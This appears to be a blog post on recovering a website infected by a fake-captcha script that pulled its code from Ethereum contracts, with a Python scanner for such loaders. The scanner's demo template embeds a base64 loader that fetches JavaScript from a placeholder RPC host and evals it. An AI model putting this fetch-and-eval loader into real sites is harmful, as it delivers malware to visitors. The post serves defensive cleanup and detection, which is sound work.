We conducted post-breach recovery and malware analysis
We helped a friendly organization clean their site after a fake captcha virus infected it. Here are our steps, findings, and tips.
A friendly group asked us for help after a strange captcha started appearing on their website. They suspected a virus infection and needed a fix. We inspected the page HTML and its scripts with the browser developer tools and found a base64-encoded script in the template header that loaded a fake captcha on every page view.
On Linux, the fake captcha only appeared after we ran a load_() call from the dev console; on Windows the page rendered it on its own, leading to phishing and malware download links, so the loader apparently behaves differently depending on the visitor's platform. We also saw casino ads and odd Google Play links at the bottom of every page. Because the problem showed up on every subpage, we knew the base template itself was infected rather than a single post.
We removed the encoded script and all of the injected ad links from the template. Admin panel passwords were reset to strong, unique values. Plugins were updated and unused extensions deleted, since an outdated plugin is the most common way such code gets written into a template. The site owner was asked to review the access logs for unusual entries, especially logins and file edits from unfamiliar addresses around the time the captcha first appeared. Reporting the incident to CERT was recommended for additional help.
Fun fact: the injected loader called two Ethereum smart contracts to fetch its actual JavaScript code. This blend of web hack and blockchain helped hide the payload: the script is read from contract storage through public RPC endpoints, so there is no attacker-owned hosting to take down, and the operator can update the payload by updating the contract.
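To make the detection and cleanup steps above concrete, here is an added triage script (our own example, not code from the infected site or from the malware). It scans a template for `atob('...')` blobs wrapped in `eval(`, decodes them, flags the indicators this case showed (DOM injection, a fake captcha string, an `eth_call` JSON-RPC request and a 40-hex-digit contract address), and strips the offending `<script>` elements. The sample template, the RPC host `rpc.example.invalid` and the all-zero contract address are constructed for the demo and are not real indicators.

```python
import base64
import re

# Constructed sample template. The base64 blob is built here from a harmless
# stand-in payload so the example runs offline; nothing in it is real malware.
_FAKE_CONTRACT = "0x" + "0" * 40  # placeholder address, not a real contract
_PAYLOAD = (
    "fetch('https://rpc.example.invalid', {method: 'POST', body: JSON.stringify("
    "{jsonrpc: '2.0', method: 'eth_call', params: [{to: '" + _FAKE_CONTRACT + "'}]})})"
    ".then(r => r.text()).then(js => eval(js));"
    "document.body.innerHTML += '<div id=\"captcha\">Verify you are human</div>';"
)
SAMPLE_TEMPLATE = (
    "<html><head><title>Site</title>\n"
    "<script>eval(atob('" + base64.b64encode(_PAYLOAD.encode()).decode() + "'));</script>\n"
    "</head><body><p>legit content</p><script>var a = 1;</script></body></html>"
)

# A long base64 literal passed to atob(); short ones are usually legitimate.
B64_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]{40,})['\"]\s*\)")
SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.S | re.I)

# Indicators taken from what the decoded loader did in this case.
INDICATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "dom_write": re.compile(r"document\.write|innerHTML"),
    "fake_captcha": re.compile(r"captcha|verify you are human", re.I),
    "eth_call": re.compile(r"\beth_call\b"),
    "contract_address": re.compile(r"0x[0-9a-fA-F]{40}"),
}


def decode_blob(blob):
    """Decode a base64 literal, or return None if it is not valid base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_template(html):
    """Return one finding per decodable atob() blob with the indicators it matched."""
    findings = []
    for m in B64_RE.finditer(html):
        decoded = decode_blob(m.group(1))
        if decoded is None:
            continue
        # Was the atob() call itself the argument of eval(...)?
        wrapped = re.search(r"eval\(\s*\Z", html[: m.start()]) is not None
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))
        findings.append({
            "offset": m.start(),
            "blob_length": len(m.group(1)),
            "wrapped_in_eval": wrapped,
            "indicators": hits,
            "decoded_preview": decoded[:80],
        })
    return findings


def clean_template(html):
    """Remove every <script> element whose decoded blob matched an indicator.

    Returns (cleaned_html, number_of_scripts_removed). Other scripts are kept.
    """
    removed = 0

    def _drop(m):
        nonlocal removed
        if any(f["indicators"] for f in scan_template(m.group(0))):
            removed += 1
            return ""
        return m.group(0)

    return SCRIPT_RE.sub(_drop, html), removed


if __name__ == "__main__":
    for f in scan_template(SAMPLE_TEMPLATE):
        print(f"offset={f['offset']} eval={f['wrapped_in_eval']} hits={f['indicators']}")
        print("  preview:", f["decoded_preview"])
    cleaned, n = clean_template(SAMPLE_TEMPLATE)
    print(f"removed {n} script element(s); {len(cleaned)} bytes remain")
```

Treat this as a first pass, not proof of a clean site: loaders are also hidden with hex escapes, `String.fromCharCode`, split strings and obfuscated PHP, and the template is only one place they live. Check the database (posts, options), uploaded PHP files and `.htaccess` as well, and if the script reappears after removal, a backdoor is still present.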
Stay alert, keep your code clean, and update your plugins on time. Catch threats early and act fast to protect your site.
